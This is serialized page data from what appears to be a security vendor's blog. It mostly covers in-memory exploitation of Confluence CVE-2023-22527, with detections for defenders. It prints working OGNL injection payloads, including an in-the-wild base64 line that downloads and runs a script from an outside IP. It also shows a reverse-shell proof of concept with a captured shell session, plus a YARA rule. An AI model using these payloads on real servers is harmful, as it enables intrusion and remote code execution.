slow and often unresponsive, leading to delays in accessing critical CVE data. This necessitates troubleshooting or waiting for resolution.",[43656,74004,74006],{":position":7055,"author":74005},"Enterprise Security Architect",[18,74007,74008],{},"I've had to code delays into my scripts to handle timeouts and 503 errors.",[18,74010,74011,74014],{},[295,74012,74013],{},"Rate Limits:"," The NIST NVD API imposes strict rate limits on queries, requiring users to wait between requests, which significantly extends downloads and processing times.",[18,74016,74017,74021],{},[68,74018],{":width":10862,"alt":74019,"src":74020},"NIST NVD Rate Limits","\u002Fblog\u002Fnvd-plus-plus\u002Fnvd-rate-limits.png","\n(Source: NIST NVD)",[43656,74023,74025],{":position":7055,"author":74024},"Frustrated Security Researcher",[18,74026,74027],{},"They require a 6-second delay between requests, causing unnecessary delays in my scripts.",[18,74029,74030,74033],{},[295,74031,74032],{},"Lack of Recent Enrichment:"," The NVD’s pause of CVE data enrichment affects the incorporation of new CVEs into CPE, NIST CWE, and NIST CVSS scoring systems.",[61,74035,74037],{"id":74036},"addressing-the-top-challenges-with-nist-nvd","Addressing the Top Challenges with NIST NVD",[18,74039,74040],{},"To address these issues, we are excited to introduce VulnCheck NVD++, a free community resource that aims to mitigate the limitations of the NIST NVD API.",[18,74042,74043],{},[68,74044],{":width":10862,"alt":73988,"src":74045},"\u002Fblog\u002Fnvd-plus-plus\u002Fvulncheck-nvd-2.png",[61,74047,74049],{"id":74048},"how-vulncheck-nvd-resolves-the-limitations-of-the-nist-nvd-api","How VulnCheck NVD++ Resolves The Limitations of the NIST NVD API?",[18,74051,74052],{},"VulnCheck NVD++ solves for the challenges of using the NIST NVD API by providing reliable access to NVD 1.0 and 2.0 through NVD++ that is available at machine speeds as a community service. We are delivering this solution to offload some of the burden that NIST NVD faces, ensuring more accessible and timely access to this critical infrastructure.",[18,74054,74055,74058],{},[295,74056,74057],{},"Enhanced Reliability:"," VulnCheck APIs are engineered for high availability, performance and stability, ensuring stable and reliable access to NIST NVD data. Users can retrieve NVD data without encountering reliability issues, alleviating the need for tuning and troubleshooting.",[18,74060,74061,74064],{},[295,74062,74063],{},"Elimination of API Rate Limits:"," VulnCheck API removes the barriers of archaic rate limits, enabling users to access NVD data at their preferred speed without restrictions or introducing artificial delays.",[18,74066,74067,74070],{},[295,74068,74069],{},"NVD Data Enrichment:"," While the NVD has paused CVE data enrichment, we are actively exploring solutions to help fill this enrichment gap and will have some exciting new community updates coming very soon... So stayed tuned!",[18,74072,73815],{},[18,74074,73818,74075],{},[47,74076,40670],{"href":40670,"rel":74077},[51],[61,74079,202],{"id":201},[18,74081,73826,74082,217],{},[47,74083,216],{"href":214,"rel":74084},[51],{"title":219,"searchDepth":220,"depth":220,"links":74086},[74087,74088,74089,74090],{"id":73995,"depth":220,"text":73996},{"id":74036,"depth":220,"text":74037},{"id":74048,"depth":220,"text":74049},{"id":201,"depth":220,"text":202},"2024-03-14",{"slug":74093},"nvd-plus-plus","\u002Fblog\u002Fnvd-plus-plus",{"title":73979,"description":73992},"blog\u002Fnvd-plus-plus",[33173],"s4BO8da_9UKeD2AYkwyhJlBrFGBTJPYrOu0u_XE9dmk",{"id":74100,"title":22211,"articles":74101,"authors":74122,"body":74124,"date":74105,"description":76687,"extension":234,"image":7,"link":7,"meta":76688,"navigation":237,"path":76690,"seo":76691,"series":7,"stem":76692,"subtype":7,"tags":7,"__hash__":76693},"blog\u002Fblog\u002Fconfluence-dreams-of-shells.md",[74102,74106,74111,74114,74117],{"title":74103,"source":11218,"link":74104,"date":74105},"Stealth Bomber: Atlassian Confluence Exploits Drop Web Shells In-Memory","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fstealth-bomber-atlassian-confluence-exploits-drop-web-shells-in-memory","2024-03-08",{"title":74107,"source":74108,"link":74109,"date":74110},"VulnRecap 3\u002F11\u002F24 – JetBrains & Atlassian Issues Persist","eSecurity Planet","https:\u002F\u002Fwww.esecurityplanet.com\u002Fthreats\u002Fvulnerability-recap-march-11-2024\u002F","2024-03-11",{"title":74112,"source":61436,"link":74113,"date":74110},"Risky Biz News: The aftermath of Microsoft's SVR hack is rearing its ugly head","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-the-aftermath-of-microsofts-svr-hack-is-rearing-its-ugly-head\u002F?ref=risky-business-news-newsletter",{"title":74115,"source":14382,"link":74116,"date":74110},"BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks","https:\u002F\u002Fthehackernews.com\u002F2024\u002F03\u002Fbianlian-threat-actors-exploiting.html",{"title":74118,"source":74119,"link":74120,"date":74121},"Printers Are “Not Nice” – PSW #820","Paul's Security Weekly Podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F12490-printers-are-not-nice-psw-820","2024-03-13",[74123],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":74125,"toc":76676},[74126,74129,74131,74154,74162,74168,74175,74182,74189,74198,74205,74213,74220,74227,74230,74234,74243,74261,74298,74301,74305,74328,74389,74397,74406,74413,74445,74455,74462,74471,74477,74669,74687,74693,74701,74708,74714,74728,74734,74737,74741,74752,74768,74783,74999,75017,75022,75029,75049,75056,75436,75449,75623,75636,75662,75672,75678,75684,75692,75696,75705,75730,75737,75744,75974,75978,75981,75987,75997,76003,76006,76334,76337,76625,76628,76630,76651,76653,76662,76673],[263,74127],{":list":74128,"ico":266,"title":22211},"[\"VulnCheck published three proof of concept exploits that can execute arbitrary code within Confluence without touching the filesystem.\",\"There are pre-existing public exploits that use similar techniques to load the infamous Godzilla webshell, and they appear to have been used in the wild.\",\"VulnCheck shares detections and indicators of compromise to aid defenders.\"]",[61,74130,11648],{"id":11647},[18,74132,74133,74134,74139,74140,74143,74144,982,74148,74153],{},"Since its disclosure on ",[47,74135,74138],{"href":74136,"rel":74137},"https:\u002F\u002Fconfluence.atlassian.com\u002Fsecurity\u002Fcve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html",[51],"January 16",", CVE-2023-22527 has been a hotbed of malicious activity. The vulnerability was quickly added to ",[47,74141,1233],{"href":69377,"rel":74142},[51]," on January 21, CISA KEV on January 24, and reports of exploitation have continued through February (see ",[47,74145,33465],{"href":74146,"rel":74147},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2024\u002F02\u002F15\u002Frce-to-sliver-ir-tales-from-the-field\u002F",[51],[47,74149,74152],{"href":74150,"rel":74151},"https:\u002F\u002Fwww.imperva.com\u002Fblog\u002Fattackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery\u002F",[51],"Imperva",". Not to be outdone, the exploit development community has been busy as well. VulnCheck currently tracks 30 unique exploits for the vulnerability.",[18,74155,74156,74157,74161],{},"Many of the exploits we track are largely the same (a phenomenon we’ve touched on ",[47,74158,36132],{"href":74159,"rel":74160},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnew-cve-2022-1388",[51],"). Consider the following exploit payloads for CVE-2023-22527:",[18,74163,74164,4606],{},[47,74165,22175],{"href":74166,"rel":74167},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fhttp\u002Fcves\u002F2023\u002FCVE-2023-22527.yaml",[51],[1925,74169,74170],{},[18,74171,74172],{},[886,74173,74174],{},"label=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027 &poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader( \\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))",[18,74176,74177,74181],{},[47,74178,36852],{"href":74179,"rel":74180},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Fmulti\u002Fhttp\u002Fatlassian_confluence_rce_cve_2023_22527.rb",[51]," (Windows Variant - immediately blocked by Defender):",[1925,74183,74184],{},[18,74185,74186],{},[886,74187,74188],{},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.YDwnBTJF,{})+\\u0027&YDwnBTJF=(new freemarker.template.utility.Execute()).exec({ @org.apache.struts2.ServletActionContext@getRequest().getParameter('PeMYYOlk')})& PeMYYOlk=cmd.exe \u002Fc \"powershell.exe -nop -w hidden -noni -c “...",[18,74190,74191,74192,74197],{},"A payload from the wild as reported by ",[47,74193,74196],{"href":74194,"rel":74195},"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F30576",[51],"Johannes Ullrich"," SANS Blog:",[1925,74199,74200],{},[18,74201,74202],{},[886,74203,74204],{},"label=\\\\u0027%2b#request\\\\u005b\\\\u0027.KEY_velocity.struts2.context\\\\u0027\\\\u005d.internalGet( \\\\u0027ognl\\\\u0027).findValue(#parameters.x,{})%2b\\\\u0027&x=(new freemarker.template.utility.Execute()).exec({ \"echo -n Y3VybCAtcyBodHRwOi8vMTk1LjIxMS4xMjQuMTg0L2FhIHx8IHdnZXQgLXEgLU8tIGh0dHA6Ly8xOTUuMjExLjEyNC4xODQvYWE= | base64 -d | sh\"})",[18,74206,74207,74208,74212],{},"A ",[47,74209,2485],{"href":74210,"rel":74211},"https:\u002F\u002Fgithub.com\u002FManh130902\u002FCVE-2023-22527-POC\u002F",[51]," example:",[1925,74214,74215],{},[18,74216,74217],{},[886,74218,74219],{},"label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet( \\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027& x=@org.apache.struts2.ServletActionContext@getResponse().setHeader( 'X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'\"+ cmd +\"'}))",[18,74221,74222,74223,74226],{},"What all these exploits have in common is that they use ",[886,74224,74225],{},"freemarker.template.utility.Execute"," to execute an operating system command. Which, you’ll know if you ever try to throw the Metasploit Windows payload, is a great way to get caught and subsequently blocked by endpoint detection.",[18,74228,74229],{},"Dear attacker, all is not lost. Loading into and executing code from Confluence’s memory works like a dream. Due to the magic of OGNL and Java reflection, there is no limit to what you can do.",[61,74231,74233],{"id":74232},"dreaming-of-shells","Dreaming of Shells",[18,74235,74236,74237,74242],{},"Originally, we approached this “execute out of memory” problem using ",[47,74238,74241],{"href":74239,"rel":74240},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FNashorn_(JavaScript_engine)",[51],"Nashorn",". While that worked (and we’ll discuss it later in the blog), there is a significantly better approach.",[18,74244,74245,74246,74250,74251,74255,74256,74260],{},"During VulnCheck’s standard GitHub exploit review for ",[47,74247,22289],{"href":74248,"rel":74249},"https:\u002F\u002Fvulncheck.com\u002Fxdb",[51],", we stumbled upon this ",[47,74252,22188],{"href":74253,"rel":74254},"https:\u002F\u002Fraw.githubusercontent.com\u002FBoogipop\u002FCVE-2023-22527-Godzilla-MEMSHELL\u002Fmain\u002Fsrc\u002Fmain\u002FMain.java",[51]," that exploits CVE-2023-22527 to load the ",[47,74257,74259],{"href":22192,"rel":74258},[51],"Godzilla webshell"," into memory. It contains at least three novel techniques that we weren’t aware of:",[1789,74262,74263,74275,74284],{},[25,74264,74265,74266,982,74270,74274],{},"It alters the max length of an OGNL expression to overcome space issues in CVE-2023-22527 exploitation. By default, Confluence appears to restrict expressions to 200 characters. Both ",[47,74267,61007],{"href":74268,"rel":74269},"https:\u002F\u002Fblog.projectdiscovery.io\u002Fatlassian-confluence-ssti-remote-code-execution\u002F",[51],[47,74271,33465],{"href":74272,"rel":74273},"https:\u002F\u002Fattackerkb.com\u002Fassessments\u002Ff4db997d-7a6a-4670-8c3a-0f660db486d4",[51]," shared different work-arounds for this limitation, but this new method completely removes the restriction.",[25,74276,74277,74278,74283],{},"The exploit uses ",[47,74279,74282],{"href":74280,"rel":74281},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcglib\u002Fcore\u002FReflectUtils.html",[51],"org.springframework.cglib.core.ReflectUtils.defineClass()"," to load a class into memory from a byte string.",[25,74285,74286,74287,74292,74293,74297],{},"The loaded class is a ",[47,74288,74291],{"href":74289,"rel":74290},"https:\u002F\u002Ftomcat.apache.org\u002Ftomcat-7.0-doc\u002Fservletapi\u002Findex.html?javax\u002Fservlet\u002FServletRequestListener.html",[51],"ServletRequestListener"," and registers to receive ",[47,74294,74296],{"href":74289,"rel":74295},[51],"ServletRequestEvents",". Meaning the uploaded class can intercept all HTTP requests to Confluence.",[18,74299,74300],{},"These three clever ideas combine to create a very powerful in-memory webshell. In the following sections, we’ll examine each step closer and then look at detection artifacts.",[993,74302,74304],{"id":74303},"loading-a-class-into-memory","Loading a Class Into Memory",[18,74306,74307,74308,74312,74313,1554,74316,74319,74320,74324,74325,4606],{},"To demonstrate using CVE-2023-22527 to load a class into memory, we’ve published a proof of concept on ",[47,74309,2485],{"href":74310,"rel":74311},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain\u002Freverseshell",[51],". If you look at the PoC, you’ll notice there are no ",[886,74314,74315],{},".java",[886,74317,74318],{},".class"," files. The class the exploit loads is a reverse shell generated by the ",[47,74321,20558],{"href":74322,"rel":74323},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F919a2aa0d57f396e70811bf349d10e5504be7987\u002Fjava\u002Fjavaclass.go#L33",[51]," framework. This is done simply by invoking the following ",[886,74326,74327],{},"java.ReverseShellBytecode",[1354,74329,74331],{"className":19022,"code":74330,"language":19024,"meta":219,"style":219},"func sendShell(conf *config.Config) bool {\n \u002F\u002F generate the class that Confluence will execute in memory\n reverseShell, className := java.ReverseShellBytecode(conf)\n",[886,74332,74333,74358,74363],{"__ignoreMap":219},[1373,74334,74335,74337,74340,74342,74344,74346,74348,74350,74352,74354,74356],{"class":1375,"line":1376},[1373,74336,19088],{"class":1397},[1373,74338,74339],{"class":7297}," sendShell",[1373,74341,1384],{"class":1383},[1373,74343,38107],{"class":19096},[1373,74345,19113],{"class":1397},[1373,74347,38112],{"class":14938},[1373,74349,59],{"class":1383},[1373,74351,38117],{"class":14938},[1373,74353,2230],{"class":1383},[1373,74355,16303],{"class":7293},[1373,74357,4765],{"class":1383},[1373,74359,74360],{"class":1375,"line":220},[1373,74361,74362],{"class":4630}," \u002F\u002F generate the class that Confluence will execute in memory\n",[1373,74364,74365,74368,74370,74373,74375,74378,74380,74383,74385,74387],{"class":1375,"line":1266},[1373,74366,74367],{"class":4640}," reverseShell",[1373,74369,5437],{"class":1383},[1373,74371,74372],{"class":4640}," className ",[1373,74374,20584],{"class":1397},[1373,74376,74377],{"class":4640}," java",[1373,74379,59],{"class":1383},[1373,74381,74382],{"class":7297},"ReverseShellBytecode",[1373,74384,1384],{"class":1383},[1373,74386,38107],{"class":4640},[1373,74388,11875],{"class":1383},[18,74390,74391,74392,74396],{},"The reverse shell automatically works on Windows or Linux (see ",[47,74393,43556],{"href":74394,"rel":74395},"https:\u002F\u002Fgist.github.com\u002Fj-baines\u002F38eb6d16eed64986a369f7f981f57508",[51],"), which is useful because Confluence can be deployed on either operating system.",[18,74398,74399,74400,74405],{},"The problem with the generated class is that it’s much too large for the 200-character OGNL expression limit. The simplest solution is to disable this limit. Using the static function ",[47,74401,74404],{"href":74402,"rel":74403},"https:\u002F\u002Fjavadoc.io\u002Fdoc\u002Fognl\u002Fognl\u002Flatest\u002Findex.html",[51],"ognl.Ognl.applyExpressionMaxLength",", the caller can lift the size restriction high enough to accommodate loading the reverse shell class. The following CVE-2023-22527 exploit lifts the expression limit to 100,000 characters.",[1925,74407,74408],{},[18,74409,74410],{},[886,74411,74412],{},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.Fvp,{})+\\u0027&Fvp=@ognl.Ognl@applyExpressionMaxLength(100000)",[18,74414,74415,74416,31814,74419,74421,74422,74425,74426,74429,74430,74435,74436,74441,74442,59],{},"Having done that, the attacker is free to load the class. This can be done using Spring’s static ",[886,74417,74418],{},"org.springframework.cglib.core.ReflectUtils.defineClass(String className, byte[] b, ClassLoader loader)",[886,74420,13590],{}," is a random string, ",[886,74423,74424],{},"b"," is the reverse shell, and ",[886,74427,74428],{},"loader"," is the ",[47,74431,74434],{"href":74432,"rel":74433},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fapi\u002Fjava\u002Flang\u002FThread.html#currentThread--",[51],"current thread","’s ",[47,74437,74440],{"href":74438,"rel":74439},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase%2F7%2Fdocs%2Fapi%2F%2F\u002Fjava\u002Flang\u002FThread.html#getContextClassLoader()",[51],"class loader"," via ",[886,74443,74444],{},"currentThread().getContextClassLoader()",[18,74446,74447,74448,74451,74452,31686],{},"As a CVE-2023-22527 exploit, that looks like the following (note, in the following, the class is sent over the wire Base64 encoded and ",[886,74449,74450],{},"Base64Utils.decodeFromString"," is invoked to decode it before passing it to ",[886,74453,74454],{},"defineClass",[1925,74456,74457],{},[18,74458,74459],{},[886,74460,74461],{},"VjI=(@org.springframework.cglib.core.ReflectUtils@defineClass( 'DpLlaMWFG',@org.springframework.util.Base64Utils@decodeFromString('classBytes…'), @java.lang.Thread@currentThread().getContextClassLoader())).newInstance()& label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.VjI,{})+\\u0027",[18,74463,74464,74465,74470],{},"The transition from the OGNL expression to executing the loaded class is the invocation of ",[47,74466,74469],{"href":74467,"rel":74468},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fapi\u002Fjava\u002Flang\u002FClass.html#newInstance--",[51],"newInstance",". That will cause the class’s constructor to be executed.",[18,74472,10402,74473,74476],{},[47,74474,2485],{"href":74310,"rel":74475},[51]," proof of concept puts that all together and establishes a reverse shell in memory.",[1354,74478,74480],{"className":31740,"code":74479,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fcve-2023-22527\u002Freverseshell$ sudo docker run -it --network=host cve-2023-22527 -a -v -e -rhost 10.9.49.97 -rport 8090 -lhost 10.9.49.82 -lport 1270 -ell SUCCESS -fll SUCCESS\ntime=2024-03-01T18:22:37.114Z level=SUCCESS msg=\"Target verification succeeded!\" host=10.9.49.97 port=8090 verified=true\ntime=2024-03-01T18:22:37.412Z level=SUCCESS msg=\"Caught new shell from 10.9.49.97:50109\"\nC:\\Program Files\\Atlassian\\Confluence>whoami\nnt authority\\network service\n\nC:\\Program Files\\Atlassian\\Confluence>\n",[886,74481,74482,74538,74582,74608,74633,74647,74651],{"__ignoreMap":219},[1373,74483,74484,74486,74488,74491,74493,74496,74499,74502,74505,74507,74509,74511,74514,74516,74518,74520,74523,74525,74528,74530,74533,74535],{"class":1375,"line":1376},[1373,74485,69770],{"class":2206},[1373,74487,17747],{"class":1391},[1373,74489,74490],{"class":1391}," docker",[1373,74492,67145],{"class":1391},[1373,74494,74495],{"class":2209}," -it",[1373,74497,74498],{"class":2209}," --network=host",[1373,74500,74501],{"class":1391}," cve-2023-22527",[1373,74503,74504],{"class":2209}," -a",[1373,74506,45584],{"class":2209},[1373,74508,38907],{"class":2209},[1373,74510,38910],{"class":2209},[1373,74512,74513],{"class":5467}," 10.9.49.97",[1373,74515,45568],{"class":2209},[1373,74517,71225],{"class":5467},[1373,74519,38916],{"class":2209},[1373,74521,74522],{"class":5467}," 10.9.49.82",[1373,74524,38922],{"class":2209},[1373,74526,74527],{"class":5467}," 1270",[1373,74529,67177],{"class":2209},[1373,74531,74532],{"class":1391}," SUCCESS",[1373,74534,67171],{"class":2209},[1373,74536,74537],{"class":1391}," SUCCESS\n",[1373,74539,74540,74542,74544,74547,74549,74551,74553,74555,74557,74559,74561,74563,74565,74567,74570,74572,74574,74576,74578,74580],{"class":1375,"line":220},[1373,74541,38930],{"class":4640},[1373,74543,5417],{"class":1397},[1373,74545,74546],{"class":1391},"2024-03-01T18:22:37.114Z",[1373,74548,38938],{"class":4640},[1373,74550,5417],{"class":1397},[1373,74552,39062],{"class":1391},[1373,74554,38946],{"class":4640},[1373,74556,5417],{"class":1397},[1373,74558,183],{"class":1387},[1373,74560,45779],{"class":1391},[1373,74562,183],{"class":1387},[1373,74564,38991],{"class":4640},[1373,74566,5417],{"class":1397},[1373,74568,74569],{"class":1391},"10.9.49.97",[1373,74571,38999],{"class":4640},[1373,74573,5417],{"class":1397},[1373,74575,71171],{"class":1391},[1373,74577,45796],{"class":4640},[1373,74579,5417],{"class":1397},[1373,74581,45801],{"class":1391},[1373,74583,74584,74586,74588,74591,74593,74595,74597,74599,74601,74603,74606],{"class":1375,"line":1266},[1373,74585,38930],{"class":4640},[1373,74587,5417],{"class":1397},[1373,74589,74590],{"class":1391},"2024-03-01T18:22:37.412Z",[1373,74592,38938],{"class":4640},[1373,74594,5417],{"class":1397},[1373,74596,39062],{"class":1391},[1373,74598,38946],{"class":4640},[1373,74600,5417],{"class":1397},[1373,74602,183],{"class":1387},[1373,74604,74605],{"class":1391},"Caught new shell from 10.9.49.97:50109",[1373,74607,19057],{"class":1387},[1373,74609,74610,74612,74614,74617,74620,74623,74626,74629,74631],{"class":1375,"line":1852},[1373,74611,46347],{"class":2206},[1373,74613,46350],{"class":1391},[1373,74615,74616],{"class":2326},"\\A",[1373,74618,74619],{"class":1391},"tlassian",[1373,74621,74622],{"class":2326},"\\C",[1373,74624,74625],{"class":1391},"onfluenc",[1373,74627,74628],{"class":4640},"e",[1373,74630,5384],{"class":1397},[1373,74632,35556],{"class":1391},[1373,74634,74635,74637,74639,74641,74644],{"class":1375,"line":4692},[1373,74636,46421],{"class":2206},[1373,74638,46424],{"class":1391},[1373,74640,8943],{"class":2326},[1373,74642,74643],{"class":1391},"etwork",[1373,74645,74646],{"class":1391}," service\n",[1373,74648,74649],{"class":1375,"line":4724},[1373,74650,6520],{"emptyLinePlaceholder":237},[1373,74652,74653,74655,74657,74659,74661,74663,74665,74667],{"class":1375,"line":4756},[1373,74654,46347],{"class":2206},[1373,74656,46350],{"class":1391},[1373,74658,74616],{"class":2326},[1373,74660,74619],{"class":1391},[1373,74662,74622],{"class":2326},[1373,74664,74625],{"class":1391},[1373,74666,74628],{"class":4640},[1373,74668,6765],{"class":1397},[18,74670,74671,74672,74674,74675,74677,74678,74683,74684,74686],{},"Above, the reader can see we establish a ",[886,74673,14509],{}," shell and execute ",[886,74676,22876],{}," just like all the ",[47,74679,74682],{"href":74680,"rel":74681},"https:\u002F\u002Fgist.github.com\u002FMSAdministrator\u002F7a61025263e279a740835da4b205e6d0#technique-commands-143",[51],"other APT",". Viewed from procmon, we can see the Confluence Tomcat server spin out ",[886,74685,14509],{}," subprocesses.",[18,74688,74689],{},[68,74690],{":width":10862,"alt":74691,"src":74692},"Tomcat spinning out cmd.exe in procom","\u002Fblog\u002Fconfluence-dreams-of-shells\u002Fconfluence-procmon-cmd.png",[18,74694,74695,74696,27987],{},"Java or Tomcat spinning out shells is a well-known issue for Confluence, and our friends at SigmaHQ already have a Sigma rule that detects this behavior for CVE-2023-22518 (see: ",[47,74697,74700],{"href":74698,"rel":74699},"https:\u002F\u002Fgithub.com\u002FSigmaHQ\u002Fsigma\u002Fblob\u002F46559388e054e1aff3d7b3d8f41ebead2b690b21\u002Frules-emerging-threats\u002F2023\u002FExploits\u002FCVE-2023-22518\u002Fproc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml#L29",[51],"SigmaHQ GitHub",[18,74702,74703,74704,74707],{},"But that isn’t the only thing that makes class loading a tight reverse shell a bad idea for an attacker. Our implementation holds open the HTTP connection, which triggers the following stack in Confluence’s ",[886,74705,74706],{},"stderr"," log file.",[1354,74709,74712],{"className":74710,"code":74711,"language":1359,"meta":219},[1357],"01-Mar-2024 13:36:56.128 WARNING [Catalina-utility-1] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-4 url: \u002Ftemplate\u002Faui\u002Ftext-inline.vm] (id=[272]) has been active for [67,521] milliseconds (since [3\u002F1\u002F24, 1:35 PM]) to serve the same request for [http:\u002F\u002F10.9.49.97:8090\u002Ftemplate\u002Faui\u002Ftext-inline.vm] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is\u002Fare [2] thread(s) in total that are monitored by this Valve and may be stuck.\n java.lang.Throwable\n at java.base@17.0.8.1\u002Fsun.nio.ch.SocketDispatcher.read0(Native Method)\n at java.base@17.0.8.1\u002Fsun.nio.ch.SocketDispatcher.read(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.ch.NioSocketImpl.tryRead(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.ch.NioSocketImpl.implRead(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.ch.NioSocketImpl.read(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.ch.NioSocketImpl$1.read(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.net.Socket$SocketInputStream.read(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.cs.StreamDecoder.readBytes(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.cs.StreamDecoder.implRead(Unknown Source)\n at java.base@17.0.8.1\u002Fsun.nio.cs.StreamDecoder.read(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.io.InputStreamReader.read(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.io.BufferedReader.fill(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.io.BufferedReader.readLine(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.io.BufferedReader.readLine(Unknown Source)\n at QfOToRTqlN.\u003Cinit>(ABCDEFG.java:31)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(Unknown Source)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.lang.reflect.Constructor.newInstanceWithCaller(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.lang.reflect.ReflectAccess.newInstance(Unknown Source)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.ReflectionFactory.newInstance(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.lang.Class.newInstance(Unknown Source)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)\n at java.base@17.0.8.1\u002Fjdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)\n at java.base@17.0.8.1\u002Fjava.lang.reflect.Method.invoke(Unknown Source)\n at ognl.OgnlRuntime.invokeMethodInsideSandbox(OgnlRuntime.java:1266)\n at ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:1251)\n at ognl.OgnlRuntime.callAppropriateMethod(OgnlRuntime.java:1969)\n at ognl.ObjectMethodAccessor.callMethod(ObjectMethodAccessor.java:68)\n at com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethodWithDebugInfo(XWorkMethodAccessor.java:98)\n at com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethod(XWorkMethodAccessor.java:90)\n at ognl.OgnlRuntime.callMethod(OgnlRuntime.java:2045)\n at ognl.ASTMethod.getValueBody(ASTMethod.java:97)\n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:212)\n at ognl.SimpleNode.getValue(SimpleNode.java:258)\n at ognl.ASTChain.getValueBody(ASTChain.java:141)\n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:212)\n at ognl.SimpleNode.getValue(SimpleNode.java:258)\n at ognl.Ognl.getValue(Ognl.java:537)\n at ognl.Ognl.getValue(Ognl.java:687)\n at ognl.Ognl.getValue(Ognl.java:662)\n at org.apache.struts2.views.jsp.ui.OgnlTool.findValue(OgnlTool.java:48)\n",[886,74713,74711],{"__ignoreMap":219},[18,74715,74716,74717,74720,74721,74724,74725,74727],{},"This stacktrace gives perfect visibility into the exploitation path. The bottom of the stack reads ",[886,74718,74719],{},"OgnlTool.findValue",", runs up through ",[886,74722,74723],{},"java.lang.Class.newInstance",", and tops off with the socket read. A very simple YARA rule to detect this in Confluence ",[886,74726,74706],{}," file follows:",[1354,74729,74732],{"className":74730,"code":74731,"language":1359,"meta":219},[1357],"rule Conflunece_CVE_2023_22527_Exploit\n{\n meta:\n description = \"Atlassian Confluence CVE-2023-22527 Exploit Attempt (In Memory Reverse Shell)\"\n path_pattern = \"C:\\\\Program Files\\\\Atlassian\\\\Confluence\\\\logs\\\\confluence[0-9]+-stderr.yyyy-mm-dd.log\"\n\n strings:\n $stuck = \u002FStuckThreadDetectionValve.notifyStuckThreadDetected Thread \\[http-nio-\\d+-exec-\\d+ url: \\\u002Ftemplate\\\u002Faui\\\u002Ftext-inline.vm\u002F\n $find = \"org.apache.struts2.views.jsp.ui.OgnlTool.findValue\"\n $callMethod = \"com.opensymphony.xwork2.ognl.accessor.XWorkMethodAccessor.callMethod\"\n $invokeMethod = \"ognl.OgnlRuntime.invokeMethod\"\n condition:\n all of them\n}\n",[886,74733,74731],{"__ignoreMap":219},[18,74735,74736],{},"So, while the reverse shell is a viable option, it’ll get caught by known 